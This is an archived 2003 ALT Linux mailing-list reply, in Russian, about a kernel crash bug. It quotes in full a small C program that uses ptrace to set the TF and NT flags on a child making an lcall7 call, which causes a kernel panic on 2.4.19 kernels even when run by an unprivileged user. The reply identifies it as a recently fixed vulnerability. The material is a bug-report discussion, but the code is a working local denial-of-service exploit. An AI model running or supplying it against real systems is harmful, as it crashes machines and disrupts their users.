From: ASA <llb@udm.ru> To: "Пушкин Сергей Алексеевич" <community@altlinux.ru> Cc: Konstantin Volckov <goldhead@altlinux.ru> Subject: [Comm] Re: [Comm] kernel panic из-за ма-а-а-аленькой программки Date: Fri, 10 Jan 2003 08:14:20 +0400 Message-ID: <1532118766.20030110081420@udm.ru> (raw) In-Reply-To: <auto-000051228161@intranet.ru> Hello Пушкин, Friday, January 10, 2003, 7:19:12 AM, you wrote: ПСА> Приветсвую, всезнающий All ПСА> Вниманию ядерщиков (или ядрёнщиков :)) ) ПСА> Есть такая программка: ПСА> //------------------------------------------------------------- ПСА> #include <sys/ptrace.h> ПСА> struct user_regs_struct ПСА> { ПСА> long ebx, ecx, edx, esi, edi, ebp, eax; ПСА> unsigned short ds, __ds, es, __es; ПСА> unsigned short fs, __fs, gs, __gs; ПСА> long orig_eax, eip; ПСА> unsigned short cs, __cs; ПСА> long eflags, esp; ПСА> unsigned short ss, __ss; ПСА> }; ПСА> int ПСА> main (void) ПСА> { ПСА> int pid; ПСА> char dos[] = "\x9A\x00\x00\x00\x00\x07\x00"; ПСА> void (*lcall7) (void) = (void *) dos; ПСА> struct user_regs_struct d; ПСА> if (!(pid = fork ())) ПСА> { ПСА> usleep (1000); ПСА> (*lcall7) (); ПСА> } ПСА> else ПСА> { ПСА> ptrace (PTRACE_ATTACH, pid, 0, 0); ПСА> while (1) ПСА> { ПСА> wait (0); ПСА> ptrace (PTRACE_GETREGS, pid, 0, &d); ПСА> d.eflags |= 0x4100; /* set TF and NT */ ПСА> ptrace (PTRACE_SETREGS, pid, 0, &d); ПСА> ptrace (PTRACE_SYSCALL, pid, 0, 0); ПСА> } ПСА> } ПСА> return 1; ПСА> } ПСА> //-------------------------------------------------------------- ПСА> Компилируется и запускается. ПСА> В результате стабильный kernel panic даже от простого юзера ПСА> (честно говоря под рутом и не пробовал) ПСА> Сизиф от 25 декабря минувшего года ПСА> rpm -qa | grep kernel ПСА> kernel24-up-2.4.19-alt0.8 ПСА> NVIDIA_kernel-up-2.4.19_1.0.3123-alt0.8 ПСА> К чему бы это? К тому, что это уязвимость ядра была найдена совсем недавно и быстро была починена. Надеюсь, что Константин уже знает о ней. -- Best regards, ASA mailto:llb@udm.ru
next prev parent reply other threads:[~2003-01-10 4:14 UTC|newest] Thread overview: 4+ messages / expand[flat|nested] mbox.gz Atom feed top 2003-01-10 3:19 Пушкин Сергей Алексеевич 2003-01-10 4:14 ` ASA [this message] 2003-01-10 7:58 ` [Comm] " Евгений В. Хорохорин 2003-01-10 12:14 ` Konstantin Volckov
Reply instructions: You may reply publicly to this message via plain-text email using any one of the following methods: * Save the following mbox file, import it into your mail client, and reply-to-all from there: mbox Avoid top-posting and favor interleaved quoting: https://en.wikipedia.org/wiki/Posting_style#Interleaved_style * Reply using the --to, --cc, and --in-reply-to switches of git-send-email(1): git send-email \ --in-reply-to=1532118766.20030110081420@udm.ru \ --to=llb@udm.ru \ --cc=community@altlinux.ru \ --cc=goldhead@altlinux.ru \ /path/to/YOUR_REPLY https://kernel.org/pub/software/scm/git/docs/git-send-email.html * If your mail client supports setting the In-Reply-To header via mailto: links, try the mailto: link
ALT Linux Community general discussions This inbox may be cloned and mirrored by anyone: git clone --mirror http://lore.altlinux.org/community/0 community/git/0.git # If you have public-inbox 1.1+ installed, you may # initialize and index your mirror using the following commands: public-inbox-init -V2 community community/ http://lore.altlinux.org/community \ mandrake-russian@linuxteam.iplabs.ru community@lists.altlinux.org community@lists.altlinux.ru community@lists.altlinux.com public-inbox-index community Example config snippet for mirrors. Newsgroup available over NNTP: nntp://lore.altlinux.org/org.altlinux.lists.community AGPL code for this site: git clone https://public-inbox.org/public-inbox.git